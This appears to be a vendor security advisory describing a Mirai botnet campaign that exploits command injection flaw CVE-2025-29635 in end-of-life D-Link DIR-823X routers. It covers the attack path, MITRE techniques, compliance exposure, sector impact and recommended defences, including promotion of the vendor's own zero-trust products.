Executive Summary
In March 2026, Akamai's Security Intelligence and Response Team (SIRT) identified active exploitation of CVE-2025-29635, a command injection vulnerability in D-Link DIR-823X routers, by a new Mirai-based malware campaign. Attackers are sending POST requests to the vulnerable endpoint, executing remote commands to download and install a Mirai variant named "tuxnokill," which enables the compromised devices to perform distributed denial-of-service (DDoS) attacks. This marks the first observed in-the-wild exploitation of this vulnerability since its disclosure in March 2025. (akamai.com)
The exploitation of end-of-life (EoL) devices underscores the critical need for organizations to replace outdated hardware and apply security patches promptly. The resurgence of Mirai variants targeting unpatched IoT devices highlights the ongoing threat posed by botnets leveraging known vulnerabilities. (bleepingcomputer.com)
Why This Matters Now
The active exploitation of CVE-2025-29635 in D-Link DIR-823X routers by Mirai-based malware emphasizes the urgency for organizations to decommission EoL devices and ensure all network equipment is up-to-date. Failure to do so increases the risk of devices being co-opted into botnets, leading to potential DDoS attacks and network compromises.
Attack Path Analysis
Attackers exploited a command injection vulnerability in D-Link DIR-823X routers to gain initial access. They then executed arbitrary commands to download and install a Mirai-based malware, achieving privilege escalation. The malware established command and control channels, enabling attackers to orchestrate DDoS attacks. No evidence of lateral movement or data exfiltration was observed. The primary impact was the enlistment of compromised devices into the botnet for DDoS activities.
Kill Chain Progression
Initial Compromise
Description
Attackers exploited CVE-2025-29635, a command injection vulnerability in D-Link DIR-823X routers, by sending specially crafted POST requests to the /goform/set_prohibiting endpoint, allowing remote code execution.
Related CVEs
CVE-2025-29635
CVSS 8.8A command injection vulnerability in D-Link DIR-823X firmware versions 240126 and 240802 allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to the /goform/set_prohibiting endpoint.
Affected Products:
D-Link DIR-823X – 240126, 240802
Exploit Status:
exploited in the wild
MITRE ATT&CK® Techniques
Exploit Public-Facing Application
Command and Scripting Interpreter: Unix Shell
Software Deployment Tools
Resource Hijacking
Network Denial of Service
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Ensure that all system components and software are protected from known vulnerabilities by installing applicable vendor-supplied security patches.
Control ID: 6.2
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management Framework
Control ID: Article 5
CISA ZTMM 2.0 – Asset Management
Control ID: 2.1
NIS2 Directive – Cybersecurity Risk Management Measures
Control ID: Article 21
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Telecommunications
High-risk sector using vulnerable D-Link routers for network infrastructure, facing botnet recruitment and DDoS attacks compromising service availability and customer connectivity.
Information Technology/IT
Critical exposure through end-of-life router exploitation enabling lateral movement, command-and-control establishment, and potential data exfiltration across managed client networks and infrastructure.
Financial Services
Severe compliance violations as botnet-compromised routers threaten encrypted traffic requirements, egress security controls, and zero-trust segmentation mandated by regulatory frameworks.
Health Care / Life Sciences
HIPAA compliance breaches through compromised network devices enabling unauthorized access, lateral movement, and potential patient data exfiltration via botnet command-and-control channels.
Sources
- New Mirai campaign exploits RCE flaw in EoL D-Link routershttps://www.bleepingcomputer.com/news/security/new-mirai-campaign-exploits-rce-flaw-in-eol-d-link-routers/Verified
- NVD - CVE-2025-29635https://nvd.nist.gov/vuln/detail/CVE-2025-29635Verified
- CVE-2025-29635: Mirai Campaign Targets D-Link Devices | Akamaihttps://www.akamai.com/blog/security-research/cve-2025-29635-mirai-campaign-targets-d-link-devicesVerified
- D-Link Technical Support Announcement SAP10469https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10469Verified
Frequently Asked Questions
Cloud Native Security Fabric Mitigations and ControlsCNSF
Aviatrix Zero Trust CNSF is pertinent to this incident as it could have limited the attacker's ability to exploit vulnerabilities and control compromised devices, thereby reducing the overall impact of the attack.
Control: Cloud Native Security Fabric (CNSF)
Mitigation: The attacker's ability to exploit the command injection vulnerability may have been constrained, reducing the likelihood of successful remote code execution.
Control: Zero Trust Segmentation
Mitigation: The attacker's ability to escalate privileges and install malware could have been limited, reducing the scope of the compromise.
Control: East-West Traffic Security
Mitigation: If lateral movement had been attempted, it would likely have been constrained, reducing the potential for further compromise.
Control: Multicloud Visibility & Control
Mitigation: The attacker's ability to establish and maintain command and control channels may have been limited, reducing their control over compromised devices.
Control: Egress Security & Policy Enforcement
Mitigation: If data exfiltration had been attempted, it would likely have been constrained, reducing the risk of data loss.
The overall impact of the attack could have been reduced, limiting the number of devices available for the botnet and the scale of the DDoS attacks.
Impact at a Glance
Affected Business Functions
- Network Security
- Internet Connectivity
Estimated downtime: 3 days
Estimated loss: $50,000
Potential exposure of network configurations and connected device information.
Recommended Actions
Key Takeaways & Next Steps
- • Implement inline intrusion prevention systems (IPS) to detect and block exploitation attempts targeting known vulnerabilities.
- • Enforce egress security and policy enforcement to control outbound traffic and prevent unauthorized communications with external command and control servers.
- • Enhance threat detection and anomaly response capabilities to identify and respond to unusual network activities indicative of malware infections.
- • Apply zero trust segmentation to limit the potential impact of compromised devices by restricting their access to critical network resources.
- • Regularly update and patch network devices to address known vulnerabilities and reduce the attack surface.
